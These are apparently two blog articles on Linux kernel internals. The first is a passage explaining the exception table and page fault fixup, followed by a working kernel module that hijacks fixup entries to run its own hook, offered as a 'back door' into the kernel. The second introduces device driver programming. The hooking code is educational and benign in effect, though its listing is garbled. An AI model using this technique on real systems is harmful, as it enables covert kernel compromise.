In this function following instruction actually copies 4 bytes from address poited by EAX (pointer given by user space program) to CPU's EDX register.

3: movl -3(%eax),%edx

We can face a page fault while executing this instruction,now lets see how we handle that. For this kernel maintains a two dimentional array of poiters, which is known as exception table (__ex_table). This table have number of enteries and each entry contains two elements or in other words if we literally see it as table, it have number of rows and two columns. First column contains the address of kernel instruction which can page fault while accessing the user space address (in our case it will be address of above mov instruction). Second column of this table contains the address of fix up codewhich need to be called when page fault occurs on instruction whose address is stored in first column. So this table looks like following:

Exception Table
| page fault address 1 | fix up address 1 |
| page fault address 2 | fix up address 2 |
| page fault address 3 | fix up address 3 |
| page fault address 4 | fix up address 4 |
| page fault address 5 | fix up address 5 |
| page fault address 6 | fix up address 6 |
| page fault address 7 | fix up address 7 |

If we look at above assembly code of function __get_user_4(), we will find ".section" in it. This is a assembler directive whcih tells the assembler to place the following instruction in a specific section of executable. In above function we are dictating the assembler to place the address of faulting kernel instructions and there corresponding fix up codes in a __ex_table section of linux kernel binary.

Following assembly instructions put the address of faulting instruction and there corresponding fix up codes in exception talble (__ex_table section of linux kernel image).

.long 1b,bad_get_user
.long 2b,bad_get_user
.long 3b,bad_get_user

1b means the first lable 1 in backward direction, which is actually the faulting instruction that is the mov instruction we discussed earlier. "bad_get_user" is another assembly lable which serves as the fix up code and will be executed if page fault occurs while executing the instruction at 1b, 2b or 3b instructions.

This is all about the exception table and setting the enteries in it, but we must know how exception table is exactly used by page fault handler. All this is discussed in the following section.

Use of Exception Table in Page Fault Handler:

In Linux Kernel, page fault handler is the do_page_fault() function defined in arch/i386/mm/fault.c file of kernel sources.

Lets assume that page fault occurs while copying the data from user space to kernel space. Immediately the page fault handler will be executed by CPU and page fault handler will check if the page faulting instruction falls in user space or in kernel space (this determines is the page fault occured in user space program or while executing the kernel instruction). If it occured in kernel, page fault handler (do_page_fault() function) will simple call fixup_exception() kernel function.

if (fixup_exception(regs))

Implementation of fixup_exception() function can be found in arch/i386/mm/extable.c file of kernel sources.

int fixup_exception(struct pt_regs *regs)
const struct exception_table_entry *fixup;

fixup = search_exception_tables(regs->eip);
if (fixup) {
regs->eip = fixup->fixup;
return 1;

return 0;

fixup_exception() function looks for the faulting address (regs->eip) in the first column of exception table and if it find it, it sets the regs_eip to the address found in the second column (this is the address of fix up code). If we are not able to find the faulting address in exception table (this means that kernel access some wrong address for which kernel do not have any fixup code). In this case page fault handler must generate the OOPS (too famous in kernel world) and core dump the kernel image.

This is all about page faulting in kernel and there handling in linux. Nows lets explore the possiblities to exploit the exception table to get an redirect the execution to our malicious code. This would be interesting and wil give you a free hand to do anything in kernel once its compromised ;-)

Hack kernel using exception table:

As now we know what exception table is and what it contains, we can think of exploiting it for getting a back door entry into kernel. In simpler words, if we are able to replace the addresses in second column (addresss of fixup code) of exception table with our own function address, we can exceute our function just by generating a page fault in kernel and that is not too difficult (just pass a wrong address in ioctl or write/read system calls, thats it an you get control to your function). You must be thinking, it can not be that simple. Well, as now you know about page fault handler and exception table, it might seems an simple thing to you.

Lets have some practicle linux kernel module for it, which can show us how we can expoit this option. Following Linux Kernel Module, will replace the addresses in exception table and then we can generate a page fault by a simple user program.

Linux Kernel Module Code:

#ifndef __KERNEL__
#define __KERNEL__

#ifndef MODULE
#define MODULE

#define __START___EX_TABLE 0xc0261e20
#define __END___EX_TABLE 0xc0264548
#define BAD_GET_USER 0xc022f39c

unsigned long start_ex_table = __START___EX_TABLE;
unsigned long end_ex_table = __END___EX_TABLE;
unsigned long bad_get_user = BAD_GET_USER;

#include "linux/module.h"
#include "linux/kernel.h"
#include "linux/slab.h"

# define PDEBUG(fmt, args...) printk(KERN_DEBUG "[fixup] : " fmt, ##args)
# define PDEBUG(fmt, args...) do {} while(0)

MODULE_PARM(start_ex_table, "l");
MODULE_PARM(end_ex_table, "l");
MODULE_PARM(bad_get_user, "l");


struct old_ex_entry {
struct old_ex_entry *next;
unsigned long address;
unsigned long insn;
unsigned long fixup;

struct old_ex_entry *ex_old_table;

void hook(void)
printk(KERN_INFO "You did a Page Fault ..... \n");

void cleanup_module(void)
struct old_ex_entry *entry = ex_old_table;
struct old_ex_entry *tmp;

if (!entry)

while (entry) {
*(unsigned long *)entry->address = entry->insn;
*(unsigned long *)((entry->address) + sizeof(unsigned
long)) = entry->fixup;
tmp = entry->next;
entry = tmp;


int init_module(void)
unsigned long insn = start_ex_table;
unsigned long fixup;
struct old_ex_entry *entry, *last_entry;

ex_old_table = NULL;
PDEBUG(KERN_INFO "hook at address : %p\n", (void *)hook);

for(; insn <>

fixup = insn + sizeof(unsigned long);

if (*(unsigned long *)fixup == BAD_GET_USER) {

PDEBUG(KERN_INFO "address : %p insn: %lx fixup : %lx\n",
(void *)insn, *(unsigned long *)insn,
*(unsigned long *)fixup);

entry = (struct old_ex_entry *)kmalloc(GFP_ATOMIC,
sizeof(struct old_ex_entry));

if (!entry){
if (ex_old_table) {
last_entry = ex_old_table;
ex_old_table = ex_old_table->next;
return -1;

entry->next = NULL;
entry->address = insn;
entry->insn = *(unsigned long *)insn;
entry->fixup = *(unsigned long *)fixup;

if (ex_old_table) {
last_entry = ex_old_table;

while(last_entry->next != NULL)
last_entry = last_entry->next;

last_entry->next = entry;
} else
ex_old_table = entry;

*(unsigned long *)fixup = (unsigned long)hook;

PDEBUG(KERN_INFO "address : %p insn: %lx fixup : %lx\n",
(void *)insn, *(unsigned long *)insn,
*(unsigned long *)fixup);



return 0;


In above Linux Kernel Module (LKM), init_modulr function simply searches the exception table fora specific fixup function (bad_get_user() function) and whereever it finds the address of this function in exception table, it replaces it with our own function hook(). It saves the pointer to bad_get_user() function, so that we can reset the exception table to its original form while removing our kernel module.

Now a simple code which calls ioctl() with a bad argument.

#include "stdio.h"
#include "sys/types.h"
#include "sys/stat.h"
#include "fcntl.h"
#include "unistd.h"
#include "errno.h"
#include "sys/ioctl.h"

int main()
int fd;
int res;

fd = open("testfile", O_RDWR | O_CREAT, S_IRWXU);
res = ioctl(fd, FIONBIO, NULL);
printf("result = %d errno = %d\n", res, errno);
return 0;


Now first load the LKM into system, then run the user program and see the /var/messages/log file, it will show you the string "You did a Page Fault ..... ". This string is printed by the hook() function of our module.

Now you can think what you can do with this, if in place you just printing the string in hook function, you do something important. You have the whole kerel world in front of you ;-)


Hope this article helps you in learning more about kernel. The intention of this article is not to hack the kernel, but rather to provide learning material for people who want to learn kernel programming.


Wednesday, February 09, 2005

Introduction to Linux Device Driver Programming

Author: Gaurav Dhiman

Introduction to Linux Device Drivers:

Linux Device Driver is actually the peace of code which very well knows the device it is controlling. It knows the behavior and has knowledge of device internals. Device Drivers in Linux can be a part of core kernel it self or it can even be developed as a separate module, which can be attached/detached from running kernel anytime, providing a flexibility in kernel to support multiple devices in dynamic environment.

In this article we will talk about writing a device driver as a kernel module. Before talking about device drivers, we should have some basic knowledge of kernel module programming in Linux. In next few sections we will discuss the basics of kernel module programming before jumping to the driver intricacies.

Introduction to Kernel Module Programming:

Kernel module is a piece of code written, compiled and loaded separately from core kernel but linked to the core kernel at load time. Kernel modules have some specific structure to follow. There are two standard functions which need to be implemented in any Linux Kernel Module; we will talk about them bit later. As earlier also mentioned kernel module is a code which attaches to the core kernel at load time and is being executed in kernel or privileged mode. Its not a user program which runs in restricted mode and have limited access to memory and other system resources. Module being a part of the kernel can access any system resource. Due to this fact, kernel module programmers need to take care that their module does not create the security loopholes in kernel and must be well-disciplined. Kernel modules should only be doing what they are supposed to do. One loosely written kernel module loaded to the core kernel can make the whole system venerable.

Module structure:
Module need to have two standard functions which take care of initializing and cleaning up of resources used by module. The standard format of module is as follows:


/*standard function for initializing the resources used by module*/

int init_module(void){

/*other function, which mplements the functionality of module*/





/*standard function for initializing the resources used by module*/

void cleanup_module(void){

In init_module() function, we request and acquire the resources required by our module. For e.g. resources can be an IRQ line (interrupt line on which our device is going to interrupt), I/O memory region, DMA channel etc. We also register few other things like major number used by our driver or the interrupt handlers for the interrupts generated by our device. Init_module() function is called at the time of loading a module to core kernel, using “insmod” or “modprobe” command.

In cleanup_module() function, we release the resources acquired in init_module() function. This function is called at the time uloading a module from core kernel, using “rmmod” command.

Presenting real time Kernel Module:
Let’s follow the tradition and write the first kernel module “hello_world.c”

#define __KERNEL__
#define MODULE


int init_module(void){
printk(<1> “My Module: Hello World !! \n”);

void cleanup_module(void ){
printk(<1> “My Module: Bye World ….. I am going !! \n”);

We need to define above mentioned two macros (__KERNEL and MODULE) for any module we write. printk() function is a brother of printf() function. The major difference between them is that printf() is a standard C library function which resides in user space and printk() is kernel function written from scratch.

Now coming the real thing – Device Drivers
Before going to the real code of device driver, let’s first understand the some basic fundamentals of what devices are in Linux. We will also discuss about how they are accessed by user processes.

Device Files and Major Numbers:
In Linux or and other Unix variant, devices re represented by files in file system. These files are known as device files or even nodes. Device files are special files through with the user process (program) can communicate (open, read, write, close etc) with the underlining device. Process uses the standard system calls, like open(), read(), write(), ioctl() etc to interact with device. With every device file a two special number are associated, which are known as a major number and minor number of a device. Major number is used by kernel to direct the user process request to right kernel driver and minor number is useless for kernel. Minor number is only used by the driver to identify the exact device which needs to be manipulated. The reason of existence of minor number is that, in practical scenario one driver can handle or control more than one device of same type or even of different types as well, so driver needs some mechanism through which it can identify which device it need to manipulate. Lets take an example, if there is a driver ”A”, which actually controls three physical devices “B”, “C” and “D”, then there need to be three device files in file system with same major number but different minor numbers.

Device files can be created with “mknod” command. It has the following syntax.

mknod {device name} {device type} {major number} {minor number}

For help on this command, refer to man pages of it.
It is a convention that device files reside in “/dev” directory of root file system, so it’s always better to create our own device files there rather than creating them somewhere else in file system.

Device Types:
Devices can mainly be categorized in three groups: character devices, block devices and the network devices.

Character Devices: These are the devices to which a user process can write or read a single character at a time. That means the interaction between device driver and actual physical device is in terms of single character. Example: keyboard, serial ports, parallel ports.

Block Devices: These are the devices to which a user process can write or read a single block of data at a time. Reading and writing on these devices are done in terms of block data. A block can be of 512 bytes, 1024 bytes or so. Example: Hard Disk, Floppy Disk.

Network Devices: These are asynchronous devices and are responsible for establishing a network connection to outside world. Best example of this type of device can be NIC card.

For not complicating things, this article will only talk about the character device drivers.

Opening a Device:
As mentioned earlier also that user process can communicate with the underlining device through device file, so for interacting with device, user process should first open the related device file, using open() system call. Once the device file is opened, user process receives the file descriptor, which it can refer in further file manipulation file system calls.

Now we will see how things work in kernel when a device file is opened by a user process. Before discussing it, let’s discuss about some related data structures.

task_struct: This data structure represents the process or task in kernel. Kernel uses this data structure to keep track of process in system and resources they are using. It is one of the main data structures in kernel and contains number of elements to track process specific information.

files_struct: This structure contains the information related to the open files per process. It keeps information to track the open files of a process. One of the elements of this structure is an array of pointers to “file” structure. This array points to different “file” structures and the index of this array is returned to process as a file descriptor when open system call is made. It also keep a count of total number of open files for a process.

file: This structure represents an open file for a process. Do not confuse it with physical file, which is represented by “inode” structure in kernel. This structure only remains in kernel memory till the file is open for a process. As soon as the process closes, exits or aborts, all the “file” structures (representing open files for that process) are destroyed, if those are not anymore pointed by any other process.

Some of the elements of “file” structure:

- f_mode: This element tells in what mode the file has been opened by the process. Process can open a file in either read (FMODE_READ) or write (FMODE_WRITE) mode. This element is normally used by device drivers to check in what mode the device file has been opened.

- f_pos: This element tells the offset (in bytes) from where to read and write in file.
- f_flags: This element also tells us in which mode the file has been opened (read or write), but it’s always recommendable to use “f_mode” element to check the mode of file. This element remembers one important thing, which might be helpful to driver writers and that is if the file has been opened in non-blocking mode or not. By default (if O_NONBLOCK flag is not mentioned at opening time) the file is opened in blocking mode. Driver checks this flag at the time of reading or writing a device. If the device file is opened in blocking mode (default mode) and at read time there is no data to be read from device or at write time driver specific buffer is full, driver puts the process to sleep on one of its local wait queues (we will soon see what wait queue are). But on other hand if the device file has been opened in non-blocking mode then the driver does not put the process to sleep, rather control returns back to user process with error.
- f_count: This element keeps track of how many processes are referring to this instance of file. As we know that all files of parent process are inherited by child process if file does not have close_on_exec element set. If the child process inherits the files from parent process, the “f_count” element of all inherited files is incremented, so that kernel can keep track of number of process this file structure. “file” structure (representing an open file) does not get destroyed on all close system calls, as it might be shared by other process also. During close system call kernel checks the “f_count” element of “file” structure and if it is zero then only “file” structure is released and its memory Is released.
- f_owner: This element tells which process is the owner of this open file. It contains the pid of the owner process. This element is used for sending the SIGIO signal to the right process in case of asynchronous notification. User process can change this element by using fcntl() system call.
- f_op: This is an important element from the perspective of device driver. This element actually points to the structure of pointers to file operations. For a device file (represented by “file” structure), this element points to the structure, which further contains pointers to driver specific functions. We will discuss in detail, the structure (file_operations) to which this element points.

- file_operations: This is an important data structure for device driver, as this is the structure through which driver registers its functions with kernel, so that kernel can call them on different events, like opening a device file, reading/writing a device file or sending ioctl commands to device. In case of device file, this structure contains pointer to different functions of driver, through which kernel invokes the driver. Now we will briefly discuss the elements of this data structure.

Some of the elements of “file_operations” structure

- llseek: This is a pointer to driver function, which actually moves or sets the “f_pos” element of device file (discussed earlier).
- read: This is a pointer to driver function, which actually physically reads data from device.
- write: This is a pointer to driver function, which actually physically writes data to device.
- poll: This function is called by either “poll” or “select” system calls.
- ioctl: This function is called by ioctl system call. This function in drier is used to pass on the special commands to device, format the device or setting the read/write head of device, which are different from normal read / write commands.
- mmap: This function of driver is used to map the device memory area to process virtual address space.
- open: This function is used to open a file. Incase of device file, this function of driver initialize the device or initializes other book keeping data structures.
- flush: This function flushes the driver buffer to physical file. This should be implemented in driver if driver wants to provide a facility to application to make sure that all the data is physically put on device.
- release: This function is called by close system call, but it is not called for every close system call. As described earlier also that one “file” data structure (which represents an open file in kernel) can be referred by more than one process, if processes are sharing the file (best example is FIFO files), in that case close system file does not release the “file” data structure and only decrement the “f_count” element of “file” data structure. If after decrementing “f_count” element turns to be zero, close system call, calls the associated “release” function, which is a driver function in case of device files. So “release” function of driver should clear and release all the memory acquired. “release” is just an opposite of “open” function.

Few Important Kernel Mechanisms used in Drivers

Wait Queues:
Wait queue is a mechanism in kernel through which the kernel code can put the process to sleep. This is used in different parts of kernel where the kernel decides to put the process to sleep. Kernel puts the process to sleep in case the required event has not yet occurred (for e.g. some process wants to read from device and there is no data to be read), in this case kernel puts the process to sleep and gets back the processor from it by calling the schedule() function, which is a scheduler in Linux Kernel. schedule() function schedules and dispatches the other process.

Before discussing the function related to sleeping a process, we should look what data structures are used for implementing a wait queue in kernel.

Wait queue is actually a linked list of “wait_queue_t” type of structures. The head of wait queue is represented by “wait_queue_head_t” structure, which contains the spin lock to synchronize the access to wait queue. “wait_queue_head_t” structure also contains the pointer to the first element in wait queue. Each element in the wait queue is represented by “wait_queue_t” structure, which contains the pointer to the “task_struct” type of structure. It also contains the pointer to next element in the wait queue. “task_struct” represents the alive process in kernel. So with this mechanism of wait queue driver or any kernel part can keep track of process waiting for a specific event to occur.

Putting process to sleep:
Process can be put to sleep by using any of the following kernel functions. You can call these functions from anywhere in the kernel (drivers, modules or the core kernel) in case you want to put your process to sleep. Whenever a kernel code is executed (when system call is made by the user process), kernel code executes in the context of process which has made a system call. But there is exception to this rule, whenever the interrupt occurs the kernel code (interrupt handler) does not execute in process context, it’s a anonymous context. This is the reason that we should be careful to not to call any function in interrupt handler which can put the execution thread to sleep. If we do so the kernel will hang, that means the system will hang.

Functions which can put a process to sleep:
- sleep_on(wait_queue_head_t * wait_queue)
- interruptible_sleep_on(wait_queue_head_t * wait_queue)
- sleep_on_timeout(wait_queue_head_t * wait_queue, long timeout)
- interruptible_sleep_on_timeout(wait_queue_head_t * wait_queue, long timeout)

In above functions, “wait_queue” is the wait_queue_head and “timeout” is the value mentioned in terms of jiffies. We will talk about jiffies very soon. Now we will see the difference between above mentioned functions.

- sleep_on: This function puts the process to sleep in TASK_UNINTERRPTIBLE mode, which means the process will not be waked up in case process receives any signal while it was in sleep. The process will only be waked up any other part of kernel code wakes it up (normally on the occurrence of some event) deliberately by calling any of the waking function (we will be discussing the waking up functions very soon). Process put to sleep with this function can sometimes cause some problem. For e.g. if a process is put to sleep with this function and the event on which it need to be waked up does not occur then your process will not come back to the execution stage. That process can not even be killed by sending a KILL signal, as process in sleep in TASK_UNINTERRUPTIBLE mode ignores all signals. Process put to sleep with this function can be waked if any of the following conditions occur:

o Process is deliberately waked up by some part of the kernel code on the occurrence of event for which it was waiting

- interruptible_sleep_on: This function in kernel is written to avoid the problem caused by “sleep_on” function. This function puts the process to sleep in TASK_INTERRUPTIBLE mode. When a process sleeps in this mode, it can be waked up if any of the following condition occurs:

o Process receives the signal either from any other process or kernel itself.
o Process is deliberately waked up by some part of the kernel code on the occurrence of event for which it was waiting.

- sleep_on_timeout: This function is similar to “sleep_on” function but is not that much dangerous as “sleep_on”. Process put to sleep with this function can be waked if any of the following conditions occurs:

o Time mentioned in the timeout parameter has expired
o Process is deliberately waked up by some part of the kernel code on the occurrence of event for which it was waiting.

- interruptible_sleep_on_timeout: I hope by now you can easily guess what this function does. Well the process put to sleep with this function is waked up when any of the following conditions occurs:

o Process receives the signal either from any other process or kernel itself.
o Time mentioned in the timeout parameter has expired
o Process is deliberately waked up by some part of the kernel code on the occurrence of event for which it was waiting.

Waking up a process:
Process put to sleep should also be waked up by some kernel code else the process will never return to the execution state. If your driver is putting the process to sleep, it’s the responsibility of that driver itself to wake up the sleeping processes when the required event occurs for which those processes are waiting. For e.g. if your driver put the reading process to sleep on its internal waiting queue, if there is nothing to read from driver buffer (driver buffer empty) then the process put to sleep should also be waked up whoever new data arrives in driver buffer (this will occur when device interrupts, so interrupt handler will be responsible for waking up the process sleeping on the driver’s waiting queue).

Functions which can be explicitly called to wake up the process:
- wake_up(wait_queue_head_t * wait_queue)
- wake_up_interruptible(wait_queue_head_t * wait_queue)
- wake_up_sync(wait_queue_head_t * wait_queue)
- wake_up_interruptible_sync(wait_queue_head_t * wait_queue)


That’s it for this time. In next article I will cover ‘ioctl’ interface of devices and different timing mechanisms available in Linux Kernel.